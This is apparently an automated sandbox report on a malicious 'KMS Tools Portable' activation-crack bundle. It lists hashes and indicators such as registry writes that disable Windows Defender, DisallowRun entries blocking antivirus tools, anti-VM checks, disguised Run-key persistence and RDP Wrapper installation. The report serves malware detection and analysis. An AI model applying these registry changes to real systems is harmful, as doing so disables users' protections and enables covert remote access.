Overview
overview
10Static
static
7KMS Tools ...2).zip
windows7-x64
1KMS Tools ...2).zip
windows10-2004-x64
1KMS Tools ...on.cmd
windows7-x64
1KMS Tools ...on.cmd
windows10-2004-x64
1KMS Tools ...le.chm
windows7-x64
1KMS Tools ...le.chm
windows10-2004-x64
1KMS Tools ...ck.exe
windows7-x64
10KMS Tools ...ck.exe
windows10-2004-x64
10KMS Tools ...++.ini
windows7-x64
1KMS Tools ...++.ini
windows10-2004-x64
1KMS Tools ...a0.exe
windows7-x64
1KMS Tools ...a0.exe
windows10-2004-x64
1KMS Tools ...a1.exe
windows7-x64
7KMS Tools ...a1.exe
windows10-2004-x64
3KMS Tools ...me.txt
windows7-x64
1KMS Tools ...me.txt
windows10-2004-x64
1Analysis
-
max time kernel
1801s -
max time network
1812s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
11-04-2023 17:47
Behavioral task
behavioral1
Sample
KMS Tools Portable (2).zip
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
KMS Tools Portable (2).zip
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
KMS Tools Portable/Add_Defender_Exclusion.cmd
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
KMS Tools Portable/Add_Defender_Exclusion.cmd
Resource
win10v2004-20230221-en
Behavioral task
behavioral5
Sample
KMS Tools Portable/KMS Tools Portable.chm
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
KMS Tools Portable/KMS Tools Portable.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
KMS Tools Portable/KMS Tools Unpack.exe
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
KMS Tools Portable/KMS Tools Unpack.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
KMS Tools Portable/KMSAuto++.ini
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
KMS Tools Portable/KMSAuto++.ini
Resource
win10v2004-20230220-en
Behavioral task
behavioral11
Sample
KMS Tools Portable/data0.exe
Resource
win7-20230220-en
Behavioral task
behavioral12
Sample
KMS Tools Portable/data0.exe
Resource
win10v2004-20230221-en
Behavioral task
behavioral13
Sample
KMS Tools Portable/data1.exe
Resource
win7-20230220-en
Behavioral task
behavioral14
Sample
KMS Tools Portable/data1.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral15
Sample
KMS Tools Portable/readme.txt
Resource
win7-20230220-en
Behavioral task
behavioral16
Sample
KMS Tools Portable/readme.txt
Resource
win10v2004-20230221-en
General
-
Target
KMS Tools Portable/KMS Tools Unpack.exe
-
Size
5.9MB
-
MD5
121bedb65ed2fa262971f41652e0210a
-
SHA1
a9bd0e456060e5cd043523bf435d7b83973d02be
-
SHA256
f62bd249cf9234a478147ea330b8dfa8900e850a0e9333fe37a91d0b7176821b
-
SHA512
c0b8b39308d86f7773a1dea1b4e17926b5ad97945a705128696a0f9a1d5ffda76198b3af39202822a2482602d539e83c250a3460f9fab1e8b76f0b86f9edd7d1
-
SSDEEP
98304:ZIsszycPJOToAeYcR3Y/02DXY4QpFEkEAivmKp7FzMlEIJ1bDRz/nD13r:LcxO5h/02tqFlvKp7lgd3N17
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2" GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" GameGuard.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" GameGuard.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 18 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ KMS Tools Unpack.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GameGuard.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ update.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe -
Blocks application from running via registry modification 27 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe" GameGuard.exe Set value (int) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe" GameGuard.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "Cureit.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe" GameGuard.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts taskhostw.exe -
Modifies Windows Firewall 1 TTPs 8 IoCs
pid Process 1616 netsh.exe 1764 netsh.exe 1664 netsh.exe 624 netsh.exe 2180 netsh.exe 1612 netsh.exe 1740 netsh.exe 1088 netsh.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWinst.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GameGuard.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion KMS Tools Unpack.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion KMS Tools Unpack.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GameGuard.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe -
Checks computer location settings 2 TTPs 28 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\International\Geo\Nation winserv.exe -
Executes dropped EXE 55 IoCs
pid Process 2032 install.exe 584 KMS.exe 1472 GameGuard.exe 1808 update.exe 2120 Game.exe 2216 net1.exe 2244 taskhostw.exe 2448 taskhost.exe 2464 svchost.exe 2648 smss.exe 2620 IP.exe 2844 winserv.exe 2952 winserv.exe 2080 winserv.exe 1728 taskhost.exe 2284 RDPWinst.exe 2916 winserv.exe 1824 taskhostw.exe 2656 winserv.exe 3016 taskhostw.exe 2876 winserv.exe 2160 winserv.exe 2460 taskhostw.exe 520 winserv.exe 696 winserv.exe 1932 winserv.exe 1624 taskhostw.exe 1204 winserv.exe 1904 winserv.exe 2548 taskhostw.exe 608 winserv.exe 2428 winserv.exe 976 taskhostw.exe 320 winserv.exe 2468 winserv.exe 1400 taskhostw.exe 2860 winserv.exe 3028 winserv.exe 1440 taskhostw.exe 288 winserv.exe 1612 winserv.exe 2448 taskhostw.exe 524 winserv.exe 2388 winserv.exe 2560 taskhostw.exe 2164 winserv.exe 3024 winserv.exe 3004 taskhostw.exe 1732 winserv.exe 1752 taskhostw.exe 892 winserv.exe 1916 winserv.exe 560 taskhostw.exe 2476 winserv.exe 2336 winserv.exe -
Loads dropped DLL 7 IoCs
pid Process 2032 install.exe 2032 install.exe 2120 Game.exe 2120 Game.exe 2464 svchost.exe 2464 svchost.exe 2124 svchost.exe -
resource yara_rule behavioral7/memory/2020-54-0x000000013F360000-0x00000001401DD000-memory.dmp themida behavioral7/memory/2020-55-0x000000013F360000-0x00000001401DD000-memory.dmp themida behavioral7/memory/2020-56-0x000000013F360000-0x00000001401DD000-memory.dmp themida behavioral7/memory/2020-57-0x000000013F360000-0x00000001401DD000-memory.dmp themida behavioral7/memory/2020-58-0x000000013F360000-0x00000001401DD000-memory.dmp themida behavioral7/memory/2020-59-0x000000013F360000-0x00000001401DD000-memory.dmp themida behavioral7/memory/2020-60-0x000000013F360000-0x00000001401DD000-memory.dmp themida behavioral7/memory/2020-61-0x000000013F360000-0x00000001401DD000-memory.dmp themida behavioral7/memory/2020-72-0x000000013F360000-0x00000001401DD000-memory.dmp themida behavioral7/memory/2020-75-0x000000013F360000-0x00000001401DD000-memory.dmp themida behavioral7/files/0x00080000000139fc-87.dat themida behavioral7/files/0x00080000000139fc-91.dat themida behavioral7/memory/2020-92-0x000000013F360000-0x00000001401DD000-memory.dmp themida behavioral7/files/0x0007000000013a0c-93.dat themida behavioral7/files/0x0007000000013a0c-96.dat themida behavioral7/files/0x0007000000013a0c-95.dat themida behavioral7/files/0x00080000000139fc-89.dat themida behavioral7/memory/1472-98-0x000000013F9A0000-0x0000000140F29000-memory.dmp themida behavioral7/files/0x00080000000139fc-99.dat themida behavioral7/memory/1472-100-0x000000013F9A0000-0x0000000140F29000-memory.dmp themida behavioral7/memory/1472-101-0x000000013F9A0000-0x0000000140F29000-memory.dmp themida behavioral7/memory/1472-102-0x000000013F9A0000-0x0000000140F29000-memory.dmp themida behavioral7/memory/1472-103-0x000000013F9A0000-0x0000000140F29000-memory.dmp themida behavioral7/memory/1472-104-0x000000013F9A0000-0x0000000140F29000-memory.dmp themida behavioral7/memory/1472-105-0x000000013F9A0000-0x0000000140F29000-memory.dmp themida behavioral7/memory/1472-106-0x000000013F9A0000-0x0000000140F29000-memory.dmp themida behavioral7/files/0x0007000000013a0c-107.dat themida behavioral7/memory/1472-109-0x000000013F9A0000-0x0000000140F29000-memory.dmp themida behavioral7/memory/1808-110-0x000000013FAE0000-0x0000000140AE0000-memory.dmp themida behavioral7/memory/1808-111-0x000000013FAE0000-0x0000000140AE0000-memory.dmp themida behavioral7/memory/1808-112-0x000000013FAE0000-0x0000000140AE0000-memory.dmp themida behavioral7/memory/1808-115-0x000000013FAE0000-0x0000000140AE0000-memory.dmp themida behavioral7/memory/1472-114-0x000000013F9A0000-0x0000000140F29000-memory.dmp themida behavioral7/memory/1808-116-0x000000013FAE0000-0x0000000140AE0000-memory.dmp themida behavioral7/memory/1808-118-0x000000013FAE0000-0x0000000140AE0000-memory.dmp themida behavioral7/memory/1808-119-0x000000013FAE0000-0x0000000140AE0000-memory.dmp themida behavioral7/memory/1472-122-0x000000013F9A0000-0x0000000140F29000-memory.dmp themida behavioral7/memory/1472-124-0x000000013F9A0000-0x0000000140F29000-memory.dmp themida behavioral7/memory/1808-125-0x000000013FAE0000-0x0000000140AE0000-memory.dmp themida behavioral7/memory/1472-139-0x000000013F9A0000-0x0000000140F29000-memory.dmp themida behavioral7/memory/1808-141-0x000000013FAE0000-0x0000000140AE0000-memory.dmp themida behavioral7/files/0x0007000000014690-158.dat themida behavioral7/files/0x0007000000014690-162.dat themida behavioral7/files/0x000600000001469f-163.dat themida behavioral7/files/0x000600000001469f-165.dat themida behavioral7/files/0x000600000001469f-166.dat themida behavioral7/files/0x0007000000014690-160.dat themida behavioral7/memory/2216-167-0x000000013FC20000-0x00000001428DF000-memory.dmp themida behavioral7/memory/1808-169-0x000000013FAE0000-0x0000000140AE0000-memory.dmp themida behavioral7/files/0x000600000001469f-170.dat themida behavioral7/memory/2244-171-0x000000013F0E0000-0x0000000142463000-memory.dmp themida behavioral7/memory/2244-172-0x000000013F0E0000-0x0000000142463000-memory.dmp themida behavioral7/memory/2244-173-0x000000013F0E0000-0x0000000142463000-memory.dmp themida behavioral7/memory/2216-174-0x000000013FC20000-0x00000001428DF000-memory.dmp themida behavioral7/memory/2244-175-0x000000013F0E0000-0x0000000142463000-memory.dmp themida behavioral7/memory/2244-176-0x000000013F0E0000-0x0000000142463000-memory.dmp themida behavioral7/memory/2244-178-0x000000013F0E0000-0x0000000142463000-memory.dmp themida behavioral7/memory/2244-180-0x000000013F0E0000-0x0000000142463000-memory.dmp themida behavioral7/files/0x0007000000014690-187.dat themida behavioral7/files/0x0007000000014690-191.dat themida behavioral7/memory/2020-190-0x000000013F360000-0x00000001401DD000-memory.dmp themida behavioral7/memory/1808-194-0x000000013FAE0000-0x0000000140AE0000-memory.dmp themida behavioral7/memory/2244-196-0x000000013F0E0000-0x0000000142463000-memory.dmp themida behavioral7/memory/2448-197-0x000000013F670000-0x000000014232F000-memory.dmp themida -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskhostw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA KMS Tools Unpack.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GameGuard.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA update.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe -
Modifies WinLogon 2 TTPs 4 IoCs
